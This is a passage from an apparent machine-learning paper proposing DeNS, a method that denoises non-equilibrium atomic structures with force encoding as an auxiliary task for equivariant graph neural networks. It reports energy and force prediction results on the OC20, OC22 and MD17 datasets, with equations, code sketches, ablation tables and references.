The energy of $S$ is denoted as $E(S) \in \mathbb{R}$, and the atom-wise forces are denoted as $F(S) = \{f_i \in \mathbb{R}^3 | i \in \{1, ..., |S|\}\}$, where $f_i$ is the force acting on the $i$-th atom. In this paper, we define a system to be an equilibrium structure if all of its atom-wise forces are close to zero. Otherwise, we refer to it as a non-equilibrium structure. Since non-equilibrium structures have non-zero atomic forces and thus are not at an energy minimum, they have more degrees of freedom and constitute a much larger set of possible structures than those at equilibrium. In this work, we focus on the task of predicting energy and forces given non-equilibrium structures. Specifically, given a non-equilibrium structure $S_{\text{non-eq}}$, GNNs predict the energy $\hat{E}(S_{\text{non-eq}})$ and atom-wise forces $\hat{F}(S_{\text{non-eq}}) = \{\hat{f}_i(S_{\text{non-eq}}) \in \mathbb{R}^3 | i \in \{1, ..., |S_{\text{non-eq}}|\}\}$ and minimize the loss function:

$$\lambda_E \cdot L_E + \lambda_F \cdot L_F = \lambda_E \cdot \left| E'(S_{\text{non-eq}}) - \hat{E}(S_{\text{non-eq}}) \right| + \lambda_F \cdot \frac{1}{|S_{\text{non-eq}}|} \sum_{i=1}^{|S_{\text{non-eq}}|} \left| f'_i(S_{\text{non-eq}}) - \hat{f}_i(S_{\text{non-eq}}) \right|^2 \tag{1}$$

$\lambda_E$ and $\lambda_F$ are energy and force coefficients controlling the relative importance of energy and force predictions. $E'(S_{\text{non-eq}}) = \frac{E(S_{\text{non-eq}}) - \mu_E}{\sigma_E}$ is the normalized ground-truth energy, obtained by first subtracting from the original energy $E(S_{\text{non-eq}})$ the mean of the energy labels in the training set $\mu_E$ and then dividing by the standard deviation of the energy labels $\sigma_E$. Similarly, $f'_i = \frac{f_i}{\sigma_F}$ is the normalized atom-wise force. For force predictions, we can either directly predict them from latent representations like node embeddings, as is common for the OC20 and OC22 datasets, or take the negative gradients of the predicted energy with respect to atomic positions for datasets like MD17.

#### 3.2 Denoising Non-Equilibrium Structures (DeNS)

##### 3.2.1 Formulation of Denoising

Denoising structures has been used to improve the performance of GNNs on 3D atomistic datasets. These methods first corrupt data by adding noise and then train a denoising autoencoder to reconstruct the original data by predicting the noise. Specifically, given a 3D atomistic system $S = \{(z_i, p_i) | i \in \{1, ..., |S|\}\}$, we create a corrupted structure $\tilde{S}$ by adding Gaussian noise with a tunable standard deviation $\sigma$ to the atomic positions $p_i$ of the original structure $S$:

$$\tilde{S} = \{(z_i, \tilde{p}_i) | i \in \{1, ..., |S|\}\}, \quad \text{where} \quad \tilde{p}_i = p_i + \epsilon_i \quad \text{and} \quad \epsilon_i \sim \mathcal{N}(0, \sigma^2 I_3) \tag{2}$$

We denote the set of noise added to $S$ as $\text{Noise}(S, \tilde{S}) = \{\epsilon_i \in \mathbb{R}^3 | i \in \{1, ..., |S|\}\}$. When training a denoising autoencoder, GNNs take $\tilde{S}$ as inputs, output atom-wise noise predictions $\hat{\epsilon}(\tilde{S})$, and minimize the L2 difference between the normalized noise $\frac{\epsilon_i}{\sigma}$ and the noise predictions $\hat{\epsilon}(\tilde{S})_i$:

$$\mathbb{E}_{p(S, \tilde{S})} \left[ \frac{1}{|S|} \sum_{i=1}^{|S|} \left| \frac{\epsilon_i}{\sigma} - \hat{\epsilon}(\tilde{S})_i \right|^2 \right] \tag{3}$$

$p(S, \tilde{S})$ denotes the probability of obtaining the corrupted structure $\tilde{S}$ from the original structure $S$.
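To make this formulation concrete, the following is a minimal PyTorch sketch of the corruption step (Equation 2) and the plain denoising objective (Equation 3); the `model` interface, mapping atomic numbers and corrupted positions to atom-wise noise predictions, is a hypothetical stand-in for an actual GNN.

```python
import torch

def corrupt(pos: torch.Tensor, sigma: float):
    """Corrupt atomic positions p_i with Gaussian noise of standard deviation sigma (Equation 2)."""
    eps = torch.randn_like(pos) * sigma   # eps_i, i.i.d. per coordinate
    return pos + eps, eps                 # corrupted positions and the added noise

def denoising_loss(model, z, pos, sigma):
    """Plain denoising objective (Equation 3): predict the normalized noise eps_i / sigma."""
    pos_tilde, eps = corrupt(pos, sigma)
    eps_hat = model(z, pos_tilde)         # atom-wise noise predictions, shape (num_atoms, 3)
    return ((eps / sigma - eps_hat) ** 2).sum(dim=-1).mean()
```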
We divide the noise $\epsilon_i$ by the standard deviation $\sigma$ to normalize the outputs of the noise predictions. When the original structure $S$ is an equilibrium structure, denoising amounts to finding the structure corresponding to the nearest local energy minimum given a high-energy corrupted structure. This makes denoising equilibrium structures a many-to-one mapping and a well-defined problem. However, when the original structure $S$ is a non-equilibrium structure, denoising, i.e., the transformation from a corrupted non-equilibrium structure to the original non-equilibrium one, can be an ill-posed problem, since there are many possible target structures to denoise to, as shown in Figure 1a.

##### 3.2.2 Force Encoding

Denoising non-equilibrium structures can be ill-posed because we do not provide sufficient information to specify the properties of the target structures. Concretely, given an original non-equilibrium structure $S_{\text{non-eq}}$ and its corrupted counterpart $\tilde{S}_{\text{non-eq}}$, some structures interpolated between $S_{\text{non-eq}}$ and $\tilde{S}_{\text{non-eq}}$ could lie in the same data distribution and therefore be potential target structures of denoising. In contrast, when denoising equilibrium structures, as shown in Figure 1b, we implicitly provide the extra information that the target structure should be at equilibrium with near-zero forces, which limits the space of possible denoising targets.

Motivated by the implicit assumption that the forces of the original structures are close to zero when denoising equilibrium ones, we propose to encode the forces of the original non-equilibrium structures when denoising non-equilibrium ones, as illustrated in Figure 1c. Specifically, when training denoising non-equilibrium structures (DeNS), GNNs take both a corrupted non-equilibrium structure $\tilde{S}_{\text{non-eq}}$ and the forces $F(S_{\text{non-eq}})$ of the original non-equilibrium structure $S_{\text{non-eq}}$ as inputs, output atom-wise noise predictions $\hat{\epsilon}\left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i$, and minimize the L2 difference between the normalized noise $\frac{\epsilon_i}{\sigma}$ and the noise predictions $\hat{\epsilon}\left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i$:

$$\mathcal{L}_{\text{DeNS}} = \mathbb{E}_{p(S_{\text{non-eq}}, \tilde{S}_{\text{non-eq}})} \left[ \frac{1}{|S_{\text{non-eq}}|} \sum_{i=1}^{|S_{\text{non-eq}}|} \left| \frac{\epsilon_i}{\sigma} - \hat{\epsilon}\left( \tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}}) \right)_i \right|^2 \right] \tag{4}$$

Equation 4 is more general and reduces to Equation 3 when the targets of denoising become equilibrium structures. Since we train GNNs with $\tilde{S}_{\text{non-eq}}$ and $F(S_{\text{non-eq}})$ as inputs and $\text{Noise}(S_{\text{non-eq}}, \tilde{S}_{\text{non-eq}})$ as outputs, they implicitly learn to leverage $F(S_{\text{non-eq}})$ to reconstruct $S_{\text{non-eq}}$ instead of predicting an arbitrary non-equilibrium structure. Comparing Index 1 and Index 2 in Table 1e, force encoding enables DeNS to significantly improve performance.

Since DeNS requires encoding of forces, it favors equivariant networks, which can easily incorporate forces as well as other higher-degree tensors into their node embeddings.
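As a concrete sketch of such force encoding (formalized as Equation 5 below), the following uses the e3nn library, assumed available, to project an atom-wise force onto spherical harmonics and expand it to multiple channels per degree; the degree and channel counts here are illustrative rather than the paper's settings.

```python
import torch
from e3nn import o3  # assumed dependency providing irreps and SO(3)-equivariant linear layers

class ForceEmbedding(torch.nn.Module):
    """Project forces onto spherical harmonics Y^(L)(f / ||f||), then expand channels."""
    def __init__(self, lmax: int = 2, channels: int = 16):
        super().__init__()
        self.irreps_sh = o3.Irreps.spherical_harmonics(lmax)      # 1x0e + 1x1o + ... up to lmax
        irreps_out = o3.Irreps([(channels, ir) for _, ir in self.irreps_sh])
        self.linear = o3.Linear(self.irreps_sh, irreps_out)       # per-degree SO(3) linear layer

    def forward(self, forces: torch.Tensor):                      # forces: (num_atoms, 3)
        norm = forces.norm(dim=-1, keepdim=True).clamp(min=1e-12)
        sh = o3.spherical_harmonics(self.irreps_sh, forces, normalize=True)
        return self.linear(norm * sh)  # multiply by ||f|| to recover magnitude, expand to C_L channels
```

The resulting embedding is simply added to the initial node embeddings, as described next.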
Specifically, the node embeddings of equivariant networks are equivariant irreps features built from vector spaces of irreducible representations (irreps) and contain $C_L$ channels of type-$L$ vectors, with degree $L$ ranging from 0 to the maximum degree $L_{\text{max}}$. $C_L$ and $L_{\text{max}}$ are architectural hyper-parameters of equivariant networks. To obtain the force embedding $x_f^{(L)}$ from the input force $f$, we first project $f$ into type-$L$ vectors, with $0 \leq L \leq L_{\text{max}}$, with spherical harmonics $Y^{(L)}\left( \frac{f}{||f||} \right)$ and then expand the number of channels from 1 to $C_L$ with an $SO(3)$ linear layer (Geiger et al., 2022; Geiger & Smidt, 2022):

$$x_f^{(L)} = \text{SO3\_Linear}^{(L)} \left( ||f|| \cdot Y^{(L)} \left( \frac{f}{||f||} \right) \right) \tag{5}$$

$x_f^{(L)}$ denotes the channels of type-$L$ vectors in the force embedding $x_f$, and $\text{SO3\_Linear}^{(L)}$ denotes the $SO(3)$ linear operation on type-$L$ vectors. Since we normalize the input force when using spherical harmonics, we multiply $Y^{(L)}\left( \frac{f}{||f||} \right)$ by the norm of the input force $||f||$ to recover the information of force magnitude. After computing force embeddings for all atom-wise forces, we add the force embeddings to the initial node embeddings to encode forces in equivariant networks.

On the other hand, it might not be as intuitive to encode forces in invariant networks, since their internal latent representations, such as node embeddings and edge embeddings, are scalars, not geometric tensors. One potential manner of encoding forces in latent representations is to project them into edge embeddings by taking inner products between forces and edge vectors of relative positions. This process is the inverse of how GemNet-OC (Gasteiger et al., 2022) decodes forces from latent representations. Since equivariant networks have been shown to outperform invariant networks on datasets containing non-equilibrium structures and are simpler to encode forces in, we mainly focus in this work on equivariant networks and how DeNS can further advance their performance.

Figure 2: Training process when incorporating DeNS as an auxiliary task. The upper blue block corresponds to the original task of energy and force predictions (Equation 1), and the lower red block corresponds to training DeNS (Equation 6). "Equivariant GNN" and "energy head" are shared across the two tasks. For each batch of structures, we use the original task for some structures and DeNS for the others.

##### 3.2.3 Training DeNS

**Auxiliary Task.** We propose to train DeNS as an auxiliary task along with the original task of predicting energy and forces to improve the performance of energy and force predictions, and we summarize the training process in Figure 2. Specifically, given a batch of structures, for each structure we decide whether to optimize the objective of DeNS (Equation 6) or the objective of the original task (Equation 1). This introduces an additional hyper-parameter $p_{\text{DeNS}}$, the probability of optimizing DeNS. We use an additional noise head for noise predictions, which slightly increases training time. Additionally, when training DeNS, similar to Noisy Nodes (Godwin et al., 2022), we also leverage energy labels and predict the energy of the original structures.
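Before formalizing the objective, a minimal sketch of one training step is shown below, following the losses given in Equations 6 and 7 below; the `model` signature with an optional `force_input` argument is hypothetical, labels are assumed pre-normalized as in Equation 1, and the default hyper-parameter values mirror the best settings reported in the ablations of Section 4.1.1.

```python
import math, random, torch

def noise_levels(sigma_low=0.01, sigma_high=0.5, T=50):
    """Geometric progression of noise standard deviations (Equation 7)."""
    return [math.exp(math.log(sigma_low) + (k - 1) / (T - 1)
                     * (math.log(sigma_high) - math.log(sigma_low))) for k in range(1, T + 1)]

def training_step(model, structure, sigmas, p_dens=0.5,
                  lambda_E=1.0, lambda_F=1.0, lambda_dens=10.0):
    z, pos, energy, forces = structure            # atomic numbers, positions, normalized labels
    if random.random() < p_dens:                  # optimize DeNS for this structure (Equation 6)
        sigma = random.choice(sigmas)             # one noise scale sampled per structure
        eps = torch.randn_like(pos) * sigma       # corrupt positions (Equation 2)
        e_hat, eps_hat = model(z, pos + eps, force_input=forces)  # force encoding (Sec. 3.2.2)
        loss = lambda_E * (energy - e_hat).abs() \
             + lambda_dens * ((eps / sigma - eps_hat) ** 2).sum(-1).mean()
    else:                                         # original energy/force task (Equation 1)
        e_hat, f_hat = model(z, pos)
        loss = lambda_E * (energy - e_hat).abs() \
             + lambda_F * ((forces - f_hat) ** 2).sum(-1).mean()
    return loss
```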
Formally, given an original non-equilibrium structure $S_{\text{non-eq}}$ and the corrupted counterpart $\tilde{S}_{\text{non-eq}}$, training DeNS corresponds to minimizing the following loss function:

$$\lambda_E \cdot L_E + \lambda_{\text{DeNS}} \cdot L_{\text{DeNS}} = \lambda_E \cdot \left| E'(S_{\text{non-eq}}) - \hat{E}(\tilde{S}_{\text{non-eq}}, F(S_{\text{non-eq}})) \right| + \lambda_{\text{DeNS}} \cdot L_{\text{DeNS}}$$ (6)

where $L_{\text{DeNS}}$ denotes the denoising loss defined in Equation 4. We note that we also encode forces, as discussed in Section 3.2.2, to predict the energy of $S_{\text{non-eq}}$, and we share the energy prediction head across Equation 1 and Equation 6. The loss function introduces another hyper-parameter $\lambda_{\text{DeNS}}$, the DeNS coefficient, controlling the importance of the auxiliary task. Additionally, the process of corrupting structures results in another hyper-parameter $\sigma$, as shown in Equation 2. We provide the pseudocode in Section E. We note that we only train DeNS with force encoding on the training set, without using any force labels on the validation and testing sets.

**Multi-Scale Noise.** Inspired by prior works on denoising score matching (Song & Ermon, 2019; 2020), we empirically find that incorporating multiple noise scales for denoising improves energy and force predictions on the OC20 and OC22 datasets. Specifically, we choose the standard deviations $\{\sigma_k\}_{k=1}^T$ to be a geometric progression satisfying $\frac{\sigma_T}{\sigma_{T-1}} = \ldots = \frac{\sigma_2}{\sigma_1} > 1$:

$$\sigma_k = \exp\left( \log \sigma_{\text{low}} + \frac{k-1}{T-1} \cdot \left( \log \sigma_{\text{high}} - \log \sigma_{\text{low}} \right) \right), \quad k = 1, \ldots, T$$ (7)

Here we use $\sigma_1 = \sigma_{\text{low}} = 0.01$ and $T = 50$ and only tune $\sigma_T = \sigma_{\text{high}}$ when multi-scale noise is adopted. When training with DeNS, for each structure we first sample a single noise standard deviation $\sigma$ from the $T$ values and then follow Equations 2 and 4. We surmise that multi-scale noise is more likely to span the distribution of meaningful non-equilibrium structures across a diverse range of atom types and geometries than a fixed $\sigma$.

##### 3.2.4 Discussion

**How DeNS Can Improve Performance.** DeNS enables leveraging more from training data to improve performance in two ways. First, DeNS adds noise to non-equilibrium structures to generate structures with new geometries and therefore naturally achieves data augmentation (Godwin et al., 2022). Second, training DeNS encourages learning a different yet highly correlated interaction. Since we encode forces as inputs and predict the original structures in terms of noise corrections, DeNS enables learning the interaction of transforming forces into structures, which is the inverse of force prediction. As demonstrated by Noisy Nodes (Godwin et al., 2022) and UL2 (Tay et al., 2023), training a single model with multiple correlated objectives to learn different interactions can help performance on the original task.

**Connection to Self-Supervised Learning.** DeNS shares similar intuitions with self-supervised learning methods like BERT (Devlin et al., 2019) and MAE (He et al., 2022) and other denoising methods (Vincent et al., 2008; 2010; Godwin et al., 2022; Zaidi et al., 2023) – they remove or corrupt a portion of the input data and then learn to predict the original data.
Learning to reconstruct data helps in learning generalizable representations, and therefore these methods can use the reconstruction task to improve the performance of downstream tasks. However, since DeNS requires force labels for encoding, it is not strictly self-supervised learning; instead, it provides another way to learn more from data. We therefore propose to use DeNS as an auxiliary task optimized along with the original tasks, rather than following the previous practice of first pre-training and then fine-tuning. Additionally, we note that before obtaining a single equilibrium structure, we need to run relaxations and generate many intermediate non-equilibrium structures; this relaxation is itself the labeling process. We hope that the ability to leverage more from non-equilibrium structures, as proposed in this work, can encourage researchers to release data containing intermediate non-equilibrium structures in addition to final equilibrium ones. Moreover, we note that DeNS can also be used in fine-tuning. For example, we can first pre-train models on the PCQM4Mv2 dataset and then fine-tune them on the smaller MD17 dataset with both the original task and DeNS.

**Marginal Increase in Training Time.** Since we use an additional noise head for denoising, training with DeNS marginally increases the time of each training iteration. We optimize DeNS for some structures and the original task for the others in each training iteration, and we demonstrate that DeNS can improve performance given the same number of training iterations. Therefore, training with DeNS only marginally increases the overall training time.

### 4 Experiments

#### 4.1 OC20 Dataset

**Dataset and Tasks.** We start with experiments on the large and diverse Open Catalyst 2020 (OC20) dataset (Chanussot* et al., 2021), which consists of about 1.2M Density Functional Theory (DFT) relaxation trajectories. Each DFT trajectory in OC20 starts from an initial structure of an adsorbate molecule placed on a catalyst surface, which is then relaxed with revised Perdew-Burke-Ernzerhof (RPBE) functional (Hammer et al., 1999) calculations to a local energy minimum. Relevant to DeNS, all the intermediate structures from these trajectories, except the relaxed structure, are considered non-equilibrium structures. The relaxed, or equilibrium, structure has forces close to zero. The primary task in OC20 is Structure to Energy and Forces (S2EF), which is to predict the energy and per-atom forces given an equilibrium or non-equilibrium structure from any point in the trajectory. These predictions are evaluated on energy and force mean absolute error (MAE). Once a model is trained for S2EF, it is used to run structural relaxations from an initial structure using the predicted forces until a local energy minimum is found. The energy predictions of these relaxed structures are evaluated on the Initial Structure to Relaxed Energy (IS2RE) task.

**Training Details.** Please refer to Section B.1 for details on DeNS, architectures, hyper-parameters and training time.

##### 4.1.1 Ablation Studies

We use EquiformerV2 (Liao et al., 2023) and the S2EF-2M split of OC20 to investigate how DeNS-related hyper-parameters affect performance, compare the results of training with and without DeNS, and verify some design choices of DeNS.

**Hyperparameters.**
In Tables 1a, 1b and 1c, we vary $\sigma_{\text{high}}$, the upper bound on the standard deviations of the Gaussian noise, $p_{\text{DeNS}}$, the probability of optimizing DeNS, and $\lambda_{\text{DeNS}}$, the loss coefficient for DeNS, to study how the hyper-parameters of DeNS affect performance. We find that the optimal settings are similar when training for different numbers of epochs and make the following observations. First, as we increase $\sigma_{\text{high}}$, force predictions become monotonically worse, while energy predictions improve but saturate at $\sigma_{\text{high}} = 0.5$. Second, $p_{\text{DeNS}} = 0.5$ and $\lambda_{\text{DeNS}}$ values of 10 and 15 work better than other values across the three different epoch budgets.

**Comparison of Training with and without DeNS.** Table 1d summarizes the results of training with and without DeNS. For EquiformerV2, incorporating DeNS as an auxiliary task boosts the performance of energy and force predictions while only increasing training time by 7.4% and the number of parameters from 83M to 89M. In particular, EquiformerV2 trained with DeNS for 12 epochs outperforms EquiformerV2 trained without DeNS for 30 epochs, saving $2.3 \times$ training time. Additionally, we show that DeNS is applicable to other equivariant networks like eSCN: training eSCN with DeNS improves both energy and force MAE while only slightly increasing training time, by 1.5%. The different increases in training time for EquiformerV2 and eSCN arise because they use different modules for noise predictions.

**Design Choices.** We conduct experiments to verify the design choices of DeNS and summarize the results in Table 1e. All the models follow the best setting for training with DeNS for 12 epochs in Table 1b. Comparing Index 1 and Index 2, we show that encoding forces $F(S_{\text{non-eq}})$ in Equations 4 and 6 enables denoising non-equilibrium structures to further improve performance. DeNS without force encoding only results in slightly better force MAE than training without DeNS as in Table 1d. We also compare DeNS with and without force encoding on the MD17 dataset in Section D.3 and find that force encoding is critical. Comparing Index 1 and Index 3, we demonstrate that predicting the energy of original structures given corrupted ones can be helpful to the original task. Additionally, we compare the performance of using a fixed $\sigma$ and multi-scale noise; the comparison between Index 1 and Index 4 shows that multi-scale noise improves both energy and force predictions. Since we sample the standard deviation $\sigma$ when using multi-scale noise, we also investigate whether we need to encode $\sigma$. The comparison between Index 1 and Index 5 shows that DeNS without $\sigma$ encoding works better, and thus we can use the same approach whether we use a fixed $\sigma$ or multi-scale noise.

##### 4.1.2 Main Results

**All + MD.** We train EquiformerV2 (160M) with DeNS on the S2EF-All+MD split of OC20. The model follows the same configuration as EquiformerV2 (153M) trained without DeNS; the additional parameters are due to force encoding and one additional equivariant graph attention block for noise predictions. We report results in Table 2. All test results are computed via the EvalAI evaluation server\(^1\). EquiformerV2 trained with DeNS achieves better S2EF results and comparable IS2RE results, setting new state-of-the-art results.
The improvement is not as significant as that on the OC20 S2EF-2M and MD17 (Section 4.3) datasets, since the OC20 S2EF-All+MD training set contains many more structures along relaxation trajectories, making the new 3D geometries generated by DeNS less helpful. However, DeNS remains valuable, because most datasets are not as large as the OC20 S2EF-All+MD dataset but instead have sizes closer to the OC20 S2EF-2M and MD17 datasets.

#### 4.2 OC22 Dataset

**Dataset and Tasks.** The Open Catalyst 2022 (OC22) dataset (Tran* et al., 2022) focuses on oxide electrocatalysis and consists of about 62k DFT relaxations obtained with Perdew-Burke-Ernzerhof (PBE) functional calculations. One crucial difference in OC22, compared to OC20, is that the energy targets in OC22 are DFT total energies. DFT total energies are harder to predict but are the most general and closest to a DFT surrogate, offering the flexibility to study property prediction beyond adsorption energies. Analogous to the task definitions in OC20, the primary tasks in OC22 are S2EF-Total and IS2RE-Total. We train models on the OC22 S2EF-Total dataset, which has 8.2M structures, and evaluate them on energy and force MAE on the S2EF-Total validation and test splits. After that, we use these models to perform structure relaxations starting from initial structures in the IS2RE-Total test split and evaluate the predicted relaxed energies on energy MAE.

**Training Details.** Please refer to Section C.1 for details on architectures, hyper-parameters and training time.

**Results.** First, we conduct ablation studies to investigate the effects of DeNS-related hyper-parameters in Section C.2. Second, we use the best hyper-parameter setting from Section C.2 to train EquiformerV2 with 18 blocks with DeNS and report the results in Table 3. Compared to EquiformerV2 trained with different energy and force coefficients but without DeNS, EquiformerV2 trained with DeNS improves the trade-off between energy and force MAE, achieving energy MAE comparable to EquiformerV2 ($\lambda_E = 1, \lambda_F = 1$) trained without DeNS and overall better force MAE than EquiformerV2 ($\lambda_E = 4, \lambda_F = 100$) trained without DeNS. For IS2RE-Total, EquiformerV2 trained with DeNS achieves the best energy MAE results. The improvement on IS2RE-Total from training with DeNS on only OC22 is comparable to that of training on the much larger combined OC20 and OC22 datasets in previous works. Specifically, training GemNet-OC on the OC20 and OC22 datasets (about 138M + 8.4M structures) improves IS2RE-Total energy MAE by 129meV (ID) and 50meV (OOD) compared to training GemNet-OC on only the OC22 dataset (8.4M structures). Compared to training without DeNS, training EquiformerV2 with DeNS improves ID by 90meV and OOD by 48meV. Thus, training with DeNS clearly improves sample efficiency and performance on OC22.

---

\(^1\)eval.ai/web/challenges/challenge-page/712

Table 4: Mean absolute error results on the MD17 testing set. Energy and force MAE are in units of meV and meV/Å, respectively. We additionally report the training time of different Equiformer models, averaged over all molecules, and the number of parameters, to show that the proposed DeNS improves performance with minimal overhead.
| Index | Attention | Layer norm. | DeNS | Aspirin | Benzene | Ethanol | Malonaldehyde | Naphthalene | Salicylic acid | Toluene | Uracil |
|-------|-----------|-------------|------|-----------|-----------|-----------|---------------|-------------|----------------|-----------|-----------|
| 1 | ✓ | ✓ | ✗ | 5.3 / 7.2 | 2.2 / 6.6 | 2.2 / 3.1 | 3.8 / 5.8 | 3.7 / 2.1 | 4.5 / 4.1 | 3.8 / 2.1 | 4.3 / 3.3 |
| 2 | ✓ | ✓ | ✓ | 5.1 / 5.7 | 2.3 / 6.1 | 2.2 / 2.6 | 3.2 / 4.4 | 3.7 / 1.7 | 4.3 / 3.9 | 3.5 / 1.9 | 4.2 / 3.3 |
| 3 | ✗ | ✓ | ✗ | 5.2 / 7.7 | 2.4 / 6.2 | 2.3 / 3.9 | 3.3 / 6.2 | 3.8 / 2.2 | 4.1 / 4.7 | 3.3 / 2.4 | 4.2 / 4.4 |
| 4 | ✗ | ✓ | ✓ | 5.2 / 6.1 | 2.4 / 6.1 | 2.2 / 2.9 | 3.2 / 5.1 | 3.7 / 1.7 | 4.2 / 3.9 | 3.4 / 2.0 | 4.2 / 3.4 |
| 5 | ✗ | ✗ | ✗ | 5.3 / 9.3 | 2.4 / 9.2 | 2.3 / 4.5 | 3.4 / 8.2 | 3.7 / 2.4 | 4.2 / 5.5 | 3.3 / 2.9 | 4.2 / 4.8 |
| 6 | ✗ | ✗ | ✓ | 5.2 / 7.3 | 2.4 / 8.1 | 2.2 / 3.4 | 3.4 / 6.7 | 3.7 / 1.9 | 4.2 / 4.4 | 3.4 / 2.2 | 4.2 / 3.8 |

Table 5: Mean absolute error results of variants of Equiformer ($L_{max} = 2$) without attention and layer normalization on the MD17 testing set. Each cell reports energy / forces MAE in units of meV and meV/Å. Index 1 and Index 2 correspond to "Equiformer ($L_{max} = 2$)" and "Equiformer ($L_{max} = 2$) + DeNS" in Table 4.

#### 4.3 MD17 Dataset

**Dataset.** The MD17 dataset (Chmiela et al., 2017; Schütt et al., 2017; Chmiela et al., 2018) consists of molecular dynamics simulations of small organic molecules. The task is to predict the energy and forces of these non-equilibrium molecules. We use 950 and 50 different configurations for the training and validation sets and the rest for the testing set.

**Training Details.** Please refer to Section D.2 for additional implementation details of DeNS, hyper-parameters and training time.

**Results.** We train Equiformer ($L_{max} = 2$) (Liao & Smidt, 2023) with DeNS based on their implementation and summarize the results in Table 4. DeNS improves the results on all molecules, and Equiformer ($L_{max} = 2$) trained with DeNS achieves overall the best results. In particular, Equiformer ($L_{max} = 2$) trained with DeNS achieves better results on all tasks and requires $3.1 \times$ less training time than Equiformer ($L_{max} = 3$) trained without DeNS. This demonstrates that, for this small dataset, training an auxiliary task and using data augmentation are more efficient and yield a larger performance gain than increasing $L_{max}$ from 2 to 3. Besides, training with DeNS only marginally increases the training time and the number of parameters, since we add one equivariant graph attention block for noise predictions. Additionally, we find that the gains from training DeNS as an auxiliary task are comparable to those from pre-training. Zaidi et al. (2023) use TorchMD-NET (Thölke & De Fabritiis, 2022) pre-trained on the PCQM4Mv2 dataset and report results on Aspirin. Their improvement on force MAE is about 17.2% (Table 3 in Zaidi et al. (2023)). Training Equiformer with DeNS results in a 20.8% improvement on force MAE without relying on another dataset. Note that we only increase training time by 10.5%, while their method takes much more time since the PCQM4Mv2 dataset is $3000 \times$ larger than MD17. Moreover, we also train variants of Equiformer ($L_{max} = 2$) by removing attention and layer normalization to investigate the performance gain of DeNS on different network architectures.
The results are summarized in Table 5, and DeNS improves all the models. We note that Equiformer without attention and layer normalization reduces to SEGNN (Brandstetter et al., 2022), but with a better radial basis function. Since these models cover many variants of equivariant networks, this suggests that DeNS is general and can be helpful to many equivariant networks.

### 5 Conclusion

In this paper, we propose to use denoising non-equilibrium structures (DeNS) as an auxiliary task to better leverage training data and improve the performance of the original tasks of energy and force predictions. Denoising non-equilibrium structures can be an ill-posed problem, since there are many possible target structures to denoise to. To address the issue, we propose to take the forces of the original structures as inputs to specify which non-equilibrium structures we are denoising. With force encoding, DeNS successfully improves the performance of the original tasks when used as an auxiliary task. We conduct extensive experiments on the OC20, OC22 and MD17 datasets to demonstrate that DeNS can boost the performance of energy and force predictions with minimal increase in training cost and is applicable to many equivariant networks.

### 6 Reproducibility Statement

We include details on DeNS, architectures, hyper-parameters and training time in Sec. B.1 (OC20), Sec. C.1 (OC22) and Sec. D (MD17). We submit our code reproducing the results of EquiformerV2 trained with DeNS on the OC20 S2EF-2M dataset and Equiformer ($L_{max} = 2$) trained with DeNS on the MD17 dataset. Following the author guide, after the discussion forums are opened for all submitted papers, we will make a comment directed to the reviewers and area chairs and put a link to an anonymous repository.

### References

Ilyes Batatia, David Peter Kovacs, Gregor N. C. Simm, Christoph Ortner, and Gabor Csanyi. MACE: Higher order equivariant message passing neural networks for fast and accurate force fields. In Advances in Neural Information Processing Systems (NeurIPS), 2022.

Simon Batzner, Albert Musaelian, Lixin Sun, Mario Geiger, Jonathan P. Mailoa, Mordechai Kornbluth, Nicola Molinari, Tess E. Smidt, and Boris Kozinsky. E(3)-equivariant graph neural networks for data-efficient and accurate interatomic potentials. Nature Communications, 13(1), May 2022. doi: 10.1038/s41467-022-29939-5. URL https://doi.org/10.1038/s41467-022-29939-5.

Johannes Brandstetter, Rob Hesselink, Elise van der Pol, Erik J Bekkers, and Max Welling. Geometric and physical quantities improve e(3) equivariant message passing. In International Conference on Learning Representations (ICLR), 2022. URL https://openreview.net/forum?id=_xwr8gOBev1.

Tom Brown, Benjamin Mann, Nick Ryder, Melanie Subbiah, Jared D Kaplan, Prafulla Dhariwal, Arvind Neelakantan, Pranav Shyam, Girish Sastry, Amanda Askell, Sandhini Agarwal, Ariel Herbert-Voss, Gretchen Krueger, Tom Henighan, Rewon Child, Aditya Ramesh, Daniel Ziegler, Jeffrey Wu, Clemens Winter, Chris Hesse, Mark Chen, Eric Sigler, Mateusz Litwin, Scott Gray, Benjamin Chess, Jack Clark, Christopher Berner, Sam McCandlish, Alec Radford, Ilya Sutskever, and Dario Amodei. Language models are few-shot learners. In Advances in Neural Information Processing Systems (NeurIPS), 2020.

Lowik Chanussot*, Abhishek Das*, Siddharth Goyal*, Thibaut Lavril*, Muhammed Shuaibi*, Morgane Riviere, Kevin Tran, Javier Heras-Domingo, Caleb Ho, Weihua Hu, Aini Palizhati, Anuroop Sriram, Brandon Wood, Junwoong Yoon, Devi Parikh, C. Lawrence Zitnick, and Zachary Ulissi.
Open Catalyst 2020 (OC20) dataset and community challenges. ACS Catalysis, 2021. doi: 10.1021/acscatal.0c04525.

Stefan Chmiela, Alexandre Tkatchenko, Huziel E. Sauceda, Igor Poltavsky, Kristof T. Schütt, and Klaus-Robert Müller. Machine learning of accurate energy-conserving molecular force fields. Science Advances, 3(5):e1603015, 2017. doi: 10.1126/sciadv.1603015. URL https://www.science.org/doi/abs/10.1126/sciadv.1603015.

Stefan Chmiela, Huziel E. Sauceda, Klaus-Robert Müller, and Alexandre Tkatchenko. Towards exact molecular dynamics simulations with machine-learned force fields. Nature Communications, 9(1), September 2018. doi: 10.1038/s41467-018-06169-2.

Mostafa Dehghani, Josip Djolonga, Basil Mustafa, Piotr Padlewski, Jonathan Heek, Justin Gilmer, Andreas Steiner, Mathilde Caron, Robert Geirhos, Ibrahim Alabdulmohsin, Rodolphe Jenatton, Lucas Beyer, Michael Tschannen, Anurag Arnab, Xiao Wang, Carlos Riquelme, Matthias Minderer, Joan Puigcerver, Utku Evci, Manoj Kumar, Sjoerd van Steenkiste, Gamaleldin F. Elsayed, Aravindh Mahendran, Fisher Yu, Avital Oliver, Fantine Huot, Jasmin Bastings, Mark Patrick Collier, Alexey Gritsenko, Vignesh Birodkar, Cristina Vasconcelos, Yi Tay, Thomas Mensink, Alexander Kolesnikov, Filip Pavetić, Dustin Tran, Thomas Kipf, Mario Lučić, Xiaohua Zhai, Daniel Keysers, Jeremiah Harmsen, and Neil Houlsby. Scaling vision transformers to 22 billion parameters. arXiv preprint arXiv:2302.05442, 2023.

